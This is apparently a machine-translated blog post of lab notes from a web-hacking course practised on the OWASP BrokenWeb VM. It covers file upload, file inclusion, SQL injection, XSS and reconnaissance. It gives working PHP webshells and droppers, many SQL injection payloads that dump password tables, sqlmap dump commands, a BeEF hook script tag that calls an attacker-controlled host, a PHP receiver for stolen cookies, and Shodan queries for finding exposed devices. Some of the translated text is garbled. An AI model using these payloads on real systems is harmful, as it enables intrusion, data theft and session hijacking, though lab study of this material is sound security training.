Hacker attack and defense of station B [network security] - record

cc attack: for applications, such as malicious swipe verification code
 DDoS attack: for servers, such as a large number of http requests, malicious access with large traffic

Note source station B video (Knowledge Area > wild Technology Association)
Hacker attack and defense: from entry to access to yu [network security]: https://www.bilibili.com/video/BV1E4411L7zS

Article catalog

Principle of file upload vulnerability

Experimental target: OWASP_ BrokenWeb_ Apps_ VM_ One point two
Download address: https://sourceforge.net/projects/owaspbwa/files/1.2/OWASP_BrokenWeb_Apps_VM_1.2.zip/download

Test penetration machine: Kali_Linux
Download address on official website: https://www.kali.org/downloads/

Experimental principle

Experimental process

Experiment 1:
In low security mode, upload any type of file without any limitation

Experiment 2:
In safe mode, bypass type upload file (file MIME type)
Change browser agent to burpsusuite agent
Modify the content type information through burpseuite to image/JPEG
Experiment 2 implementation principle:

Experiment 3:
High security mode, upload one sentence picture Trojan horse (file suffix limit)


shell2.php #eval uses php functions, such as phpinfo();
<?php eval($_REQUEST['cmd']);?>;

shell3.php #System uses Linux system commands, such as ls,cp,rm
<?php system($_REQUEST['yangge']);?> /etc/passwd
#Change the ip address to your own

Detailed explanation of kitchen knife + download link on official website

Official website of China kitchen knife: http://www.maicaidao.co/
Tencent Hubble drug detection (slight risk): https://habo.qq.com/

Found in file readme.txt There are detailed usage methods

File Inclusion

Project experimental environment

Local file contains: LFI
Remote file contains: RFI

The teacher drew the picture by hand

Hazards and principles of file containing vulnerabilities

Low security level

Local file contains

Local file contains + webshell

One word Trojan script
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangge]);?>')?>

edjpgcom tool link:
Link: https://pan.baidu.com/s/1JrO1IDzkLyhqn2AGh6wD2Q
Extraction code: nq6d

Note: the picture cannot be too large, or it may not run

Relative path
//Absolute path

Remote file contains + webshell
Set up a remote server
Install web services (apache2)
systemctl start apache2
vim /var/www/html/yangge.txt

<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[yangge50]);?>')?>

Medium security level

**Local file contains: * * same as low security level operation
**Local file contains + webshell: * * same as low security level operation

Remote file contains + webshell
STR for background source code_ The replace function only replaces one http: / /, which is changed to httphttp:// 😕 /Just do it

High security level

The background source code is written to death, and the included file is fixed. It is safe but inflexible

SQL injection attack and defense

Project experimental environment

Experimental target: OWASP_ BrokenWeb_ Apps_ VM_ One point two
Download address: https://sourceforge.net/projects/owaspbwa/files/1.2/OWASP_BrokenWeb_Apps_VM_1.2.zip/download

Test penetration machine: Kali_Linux
Download address on official website: https://www.kali.org/downloads/

SQL injection hazard

  1. User data disclosure caused by dragging database
  2. Endangering the security of web and other applications
  3. Loss of control of the operating system
  4. Illegal trading of user information
  5. Endangering the safety of enterprises and the country

SQL foundation review

1. Log in to OWASP

2. View database
show databases; view all databases
select database(); view the current library
use dvwa
3. View tables in the library
show tables;
4. View table structure
desc table;
5. View table records
For example, select statement

//Simple query example
//Current library dvwa dvwa .users
mysql> select * from users;
mysql> select user_id,first

//Other databases mysql.user
mysql> desc mysql.user;
mysql> select * from mysql.user;
mysql> select user,password,host from mysql.user;

//wordpress other libraries .user
mysql> desc wordpress.wp_users;
mysql> select * from wordpress.wp_users;
wysql> select user_login,user_pass from wordpress.wp_users;

//Example of condition query
mysql> select user,password,host from mysql.user where user='root';
mysqi> select user,password,host from mysql.user where user='root' and host='localhost':
mysql> select user,password,host from mysql.user where user='root' or host='localhost';

mysql> desc dvwa .users;
mysq1> select user_id,first_name,last_name from dvwa.users where first_name='yangge';
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge' or 1=1;
mysqi> select user_id,first_name,last_name from dvwa.users where first_name='admin' and 1=2;

mysql> select user_id,first_name,last_name from dvwa.users where user_id=2;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7 or 1=1;

Joint query

Note: the number of fields before and after union query must be the same
mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;

Injection statement

mysql> select * from dvwa.users union select user_login,user_pass,1,2,3,4 from wordpress.wp_users;

6,information_schema (metadata)

====Query database database name and table name information_schema.tables===
mysql> select * from information_schema.TABLES\G
mysql> select DISTINCT TABLE_SCHEMA from information_schema.TABLES;  //Equivalent to show databases
mysql> select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES\G
mysql> select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY
mysql> select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='dvwa';  //Equivalent to show tables

===Query database database name, table name, field name information_schema.columns===
mysql> select * from information_schema.columns\G
mysql> select column_name from INFORMATION_SCHEMA.columns
mysql> select column_name from INFORMATION_SCHEMA.columns where table_schema='dvwa' and table_name='users';  //Equivalent to desc
mysql> select column_name from INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES';  
mysql> select column_name from INFORMATION_SCHEMA.columns where table_name='SCHEMA_PRIVILEGES';  

SQL injection process

Manual injection practice

1. Error based injection

Purpose: to test whether there is injection point in a certain position

analysis of sentences

Error in entering single quotation mark '

select first_name,last_name from dvwa users where user_id='''

2. Boolean based injection

Injection statement

select first_name,last_name from dvwa users where user_id='' or 1=1 -- yangge '

' or 1=1 -- yangge
The first 'is to close the previous condition
or 1=1 is true
-- comment out all subsequent statements

Generally, all data in this table can be found

3. UNION based injection

//Query all library names
'union select TABLE_SCHEMA, 1 from INFORMATION_SCHEMA.tables -- '
mysql> select first_name,last_name from dvwa.users where user_id='' union select TABLE_SCHEMA, 1 from INFORMATION_SCHEMA.tables -- '
//Query table names of all libraries
' union select table_name,1 from INFORMATION_SCHEMA.tables -- ''
mysql> select first_name,last_name from dvwa.users where user_id='' union select table_name,1 from INFORMATION_SCHEMA.tables -- ''
//Query all table names and corresponding library names
' union select TABLE_SCHEMA, table_name from SINFORMATION_SCHEMA.tables -- ''
mysql> select first_name,last_name from dvwa.users where user_id='' union select TABLE_SCHEMA, table_name from SINFORMATION_SCHEMA.tables -- ''

//Original statement
mysq1> select first_name,last_name from dvwa.users where user_id='$id'
//Query data table
'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name="users' --'
'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name='USER PRIVILEGE' --'
'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name='SCHEMA_PRIVILEGES' --'

//Query data column
'union select NULL, user from users -- '
'union select NULL, password from users -- '
'union select user, password from users -- '
'union select NULL, GRANTEE from USER_PRIVILEGES -- '
'union select password, concat(first_name,' ',last_name,' ',user)  from users --'
//Input statement
mysq1> select first_name,last_name from dvwa.users where user_id=' 'union select password, concat(first_name,' ',last_name,' ',user)  from users --'

Injection statement

You can find the data of those tables other than this one
Premise is
The first thing to know is the number of fields queried by SQL statement before union
Second, you need to know the field name of the table to look up after union

4. Time based blind annotation

SQL injection (Blind) - blind

Some databases have made security configuration for error information, so that injection point cannot be detected by the above methods. At this time, injection point can be detected by setting sleep statement
1' and sleep(5) -- '

SQLInjection statement resolution:
mysql> select first_name,last_name from dvwa.users where user_id='1' and sleep(5) -- '

SQLmap auto injection

SQL map is an easy-to-use tool for SQL injection, which is the first open source tool. SQLmap is a well-known security and stability testing tool at home and abroad, which can be used for automatic detection, using SQL injection vulnerabilities, and obtaining database server permissions. It has a powerful detection engine, which can test the security and stability of different types of databases, including obtaining the data in the database, accessing the operating system files and even executing the operating system commands through the way of external data connection.
Security vulnerability detection in sqlmapx mysql, Oracle, PostgreSQL, Microsoft SQL server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and other databases
sqlmap -hh | less

Self translation of all parameters (my English slag)

1. GET method injection + data acquisition

OWASPMutillidae, a target with login permission vulnerability

Inject by specifying parameters (copy page links, plus parameters)

root@kali:#sqlmap -u "" --batch -p username

Get all databases

root@kali:#sqlmap -u "" --dbs

Get all users

root@kali:#sqlmap -u "" --users

Get current user

root@kali:#sqlmap -u "" --current-user
--users  //Get all users
--current-user //Get current user
--dbs	//Get all databases
--current-db	//Get current database
-D "database_name" --tables
-D "database_name" -T "table_name" --colun
--dump-all //dump the whole database(take)come down
--dump-all --exclude-sysdbs //Exclude system library
-D "database_name" -T "table_name" --dump
-D "database_name" -T "table_name" -C "username, password" --dump
--batch //Automated completion![Insert picture description here](https://img-blog.csdnimg.cn/20200620142056130.png)

Demonstration steps:

2. POST method injection + data acquisition

A cookie is required to access the injected page, – cookie = ""
root@kall :~# sqlmap -u " "-- cookie = change to your own" -- batch
Use multiple cookie s; separate
PHPSESSID = ID (idea, use =, not:)

Demonstration steps (similar to GET):

3. Right operation

Authorization operation: -- SQL shell

After obtaining sql permission (operating database):
sql-shell:select * from users;

4. Comprehensive example

Cross site script attack XSS

###1. Introduction to XSS ! [introduction to XSS]( https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vd29fYmVsbC9QaWN0dXJlQmVkL3Jhdy9tYXN0ZXIvaW1hZ2UvWFNTJUU3JUFFJTgwJUU0JUJCJThCLnBuZw?x-oss-process=image/format,png) ###2. Principle analysis ![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vd29fYmVsbC9QaWN0dXJlQmVkL3Jhdy9tYXN0ZXIvaW1hZ2UvMjAyMDA2MjAxNzA2NDQucG5n?x-oss-process=image/format,png) General for search box ![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vd29fYmVsbC9QaWN0dXJlQmVkL3Jhdy9tYXN0ZXIvaW1hZ2UvMjAyMDA2MjAxNzE0MjkucG5n?x-oss-process=image/format,png)

3. Construct XSS script

Common HTML tags

Common JavaScript methods

Construct XSS script

These two commands are mainly used

<script src="http://BeEF_IP:3000/hook.js"></script> #Combining with BeEF to collect user's cookie s and ingeniously use picture Tags
<img src="http://BeEF_IP:3000/hook.js"></img>

4. Reflective XSS

Security level

Low security level

Code snippets can be sent directly (both XSS retrieved and XSS stored)

Bullet box warning:
//Page redirection:
      • >Manual XSS

5 storage XSS (XSS stored)

Storage XSS (persistent XSS) means that the attacker places the link with XSS attack on a page, such as comment box, etc;
Users access this XSS link and execute it. Because the storage XSS can attack all users who access this page, it is very harmful.

      • >Manual [low]
Attack 1 bullet box alarm: operation on kali Linux end of penetration machine

Attack 2 obtain cookie: operation on Kali Linux side of penetration machine
	1. Build a cookie collection server
	2. Construct XSS code and embed it into Neb server
	3. Wait for the chicken to trigger the xSS code and send the cookie to Kali
	4.Cookie utilization

Get user cookie s
This kali clock in Apache service
systemctl start apache2
Create a new php file to store cookie s
vim /var/www/html/cookie_rec.php
Write content:

$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log, $cookie . "\n");

Give directory permission
chown -R www-data.www-data /var/www/

Implanting XSS code by osmosis machine:
Note: is Kali Linux IP (replace it with your own)
Note: clear the XSS code implanted before first

You can visit the website on another computer at / var/www/html/cookie.txt It is seen in the file that the cookie has been obtained

6 automatic XSS

About BeEF

Browser Exploitation Framework (BeEF)
BeEF is the most powerful browser open-source penetration testing framework at present. It penetrates through XSS vulnerability with JS script and Metasploit;
BeEF is based on Ruby language, and supports graphical interface, easy to operate;

Information collection:
1. Network discovery
2. Host information
3.Cookie acquisition
4. Session hijacking
5. Keyboard record
6. Plug in information

Persistent control:
Information collection:
1. Network discovery
2. Host information
3.Cookie acquisition
4. Session hijacking
5. Keyboard record
6. Plug in information

Persistent control:
1 confirmation box
2. Small window
3. Intermediary

Social engineering:
1. Click hijack
2. Pop up alarm
3. False page
4. Fishing page

BeEF Foundation

Start Apache and BeEF:
service apache2 start

Note: clear the XSS code implanted before first

Log in to beef in the browser: : 3000 / UI / panel
Login account: beef
Login password: beef

information gathering

Command Color:
Green is active and invisible to the target host (will not be discovered)
Orange works for target hosts but may be visible (may be found)
Gray may not be valid for the target host (verifiable)
Red is not valid for the target host

Reflective -- "non persistent
Storage - persistence

Search engine for Web information collection

Search Engines:
Google Hacking
Shodan Hacking (Satan)
Zoomeye Hacking (eyes of Zhong Kui - Satan domestic edition)

Information collection overview

  1. Web information collection (detection), that is, web stampede, is mainly to grasp all aspects of the target web services, and is the preparatory work before web penetration and intrusion
  2. Web stampede content includes operating system, server type, database type, web container, web language, domain name information, website directory
  3. Web information collection involves search engine, website scanning, domain name traversal, fingerprint identification, etc

Project experimental environment

  1. Target: OWASP_ Broken_ Web_ Apps_ VM_ One point two
  2. Test penetration machine: win7/Kali

Google Hacking

Different search behaviors







reference resources
Search: articles with test scores but not SAT entry scores:

Search: a professional report on the flying speed of common swallows

Search: Dr.Ronald 50. Notes on photosynthesis written by green and Dr. Thomas P.Buttz

Shodan Hacking

Shodan (Satan search engine), written by John Matherly, a web engineer, is called "the most terrible search engine". It can scan all networked devices, in addition to common web servers; it can also scan all networked devices such as firewalls, routers, switches, cameras, printers, etc



The idea of keyword based search is to search "default password" country: "TH" according to banner information (device fingerprint)
FTP anon successful


product:"Microsoft IIS httpd"
product:"Apache httpd"

product:MySQL version:"5.1.73"
product:"Microsoft IIS httpd" version:"7.5"

hostname: org
hostname: edu

os:"Windows Server 2008 R2"
os:"Windows 7 or 8"
os:"Linux 2.6.x"

net net:
200 ok net:110,180.13.0/24
200 ok country: JP net:

port: 3389
port: 445
port: 22
port: 80
port: 443

Comprehensive example

Search for devices with port 80 open in Japan:
country:jp port:"80"
country:jp port:"80" product:"Apache httpd"
country:jp port:"80" product:"Apache httpd" city:"Tokyo"
country:jp port:"80" product:"Apache httpd" city:"Tokyo" os:"Linux 3.x"

//Search for devices using Linux 2.6. X in Japan:
country:jp os:"Linux 2.6.x"
country:jp os:"Linux 2.6.x" port:"80"
country:jp os:"Linux 2.6.x" port:"80" product:"Apache httpd"

//Search for devices using windows Server System in Japan:
country:jp os:"Windwws Server 2008 R2"
country:jp os:"Windows Server 2003" port:"445"
country:jp os:"Nindows Server 2003" port:"80"

//To request devices using Microsoft IIS in Japan:
country:jp product:"Microsoft IIS httpd" version:"7.5"

Zoomeye Hacking


User manual (shift + /): https://www.zoomeye.org/help
Go play by yourself...

Target scanning of Web information collection

Keywords: MySQL PHP SQL Database

Added by FoxhoundX on Sun, 21 Jun 2020 12:11:09 +0300